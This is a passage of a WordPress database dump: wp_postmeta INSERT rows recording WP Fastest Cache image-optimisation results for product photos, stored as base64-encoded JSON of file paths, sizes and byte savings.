C93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmluaXNoLWxpbmUtMjAweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9maW5pc2gtbGluZS0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTMwOSwiaWQiOjIyMDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmluaXNoLWxpbmUtMjI1eDE5OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9maW5pc2gtbGluZS0yMjV4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZpbmlzaC1saW5lLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MzExLCJpZCI6MjIwMn1d'); 
INSERT INTO `wp_postmeta` VALUES (28870, 2201, 'wpfc_optimisation_reduction', '24476'); 
INSERT INTO `wp_postmeta` VALUES (28871, 2201, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLmpwZyIsIndpZHRoIjo0ODAsImhlaWdodCI6MTk4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0xLmpwZyIsInJlZHVjdGlvbiI6MjQ0NzIsInRpbWUiOjE0ODM1NDkzMTgsImlkIjoiMjIwMSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLTM0MHgxOTguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLTM0MHgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0xLTM0MHgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MzIwLCJpZCI6MjIwMX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTEtMjUweDE5OC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjE5OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTEtMjUweDE5OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTEtMjUweDE5OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDkzMjIsImlkIjoyMjAxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMS0yMDB4MTk4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTk4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMS0yMDB4MTk4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtMS0yMDB4MTk4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTMyNCwiaWQiOjIyMDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLTIyNXgxOTguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoxOTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xLTIyNXgxOTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0xLTIyNXgxOTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ5MzI3LCJpZCI6MjIwMX1d'); 
INSERT INTO `wp_postmeta` VALUES (28872, 2087, 'wpfc_optimisation_reduction', '9593'); 
INSERT INTO `wp_postmeta` VALUES (28873, 2087, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLmpwZyIsIndpZHRoIjo1NjE2LCJoZWlnaHQiOjM3NDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDkzMzEsImlkIjoiMjA4NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2MzIsInRpbWUiOjE0ODM1NDkzMzUsImlkIjoyMDg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTE2OSwidGltZSI6MTQ4MzU0OTMzOCwiaWQiOjIwODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMTIzLCJ0aW1lIjoxNDgzNTQ5MzQyLCJpZCI6MjA4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oeWRyYXVsaWMtb2lsLTEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oeWRyYXVsaWMtb2lsLTEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NDIwNiwidGltZSI6MTQ4MzU0OTM0NiwiaWQiOjIwODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MjgsInRpbWUiOjE0ODM1NDkzNTAsImlkIjoyMDg3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWh5ZHJhdWxpYy1vaWwtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDUzLCJ0aW1lIjoxNDgzNTQ5MzUzLCJpZCI6MjA4N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oeWRyYXVsaWMtb2lsLTEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1oeWRyYXVsaWMtb2lsLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1oeWRyYXVsaWMtb2lsLTEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUwOCwidGltZSI6MTQ4MzU0OTM1NiwiaWQiOjIwODd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtaHlkcmF1bGljLW9pbC0xLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5NzQsInRpbWUiOjE0ODM1NDkzNjAsImlkIjoyMDg3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28874, 2018, 'wpfc_optimisation_reduction', '6333'); 
INSERT INTO `wp_postmeta` VALUES (28875, 2018, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTQ5MzY0LCJpZCI6IjIwMTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTYxLCJ0aW1lIjoxNDgzNTQ5MzY4LCJpZCI6MjAxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjc4NywidGltZSI6MTQ4MzU0OTM3MiwiaWQiOjIwMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo4MTksInRpbWUiOjE0ODM1NDkzNzYsImlkIjoyMDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxODk4LCJ0aW1lIjoxNDgzNTQ5MzgxLCJpZCI6MjAxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU4MSwidGltZSI6MTQ4MzU0OTM4NSwiaWQiOjIwMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTUsInRpbWUiOjE0ODM1NDkzODgsImlkIjoyMDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTI4LCJ0aW1lIjoxNDgzNTQ5MzkyLCJpZCI6MjAxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTItMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMi0xLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjY2NCwidGltZSI6MTQ4MzU0OTM5NywiaWQiOjIwMTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28876, 2002, 'wpfc_optimisation_reduction', '77635'); 
INSERT INTO `wp_postmeta` VALUES (28877, 2002, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXBvci1EZWdyZWFzZXItMS5qcGciLCJ3aWR0aCI6NjgwLCJoZWlnaHQiOjQ5OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZhcG9yLURlZ3JlYXNlci0xLmpwZyIsInJlZHVjdGlvbiI6Nzc2MzAsInRpbWUiOjE0ODM1NDk0MDQsImlkIjoiMjAwMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFwb3ItRGVncmVhc2VyLTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3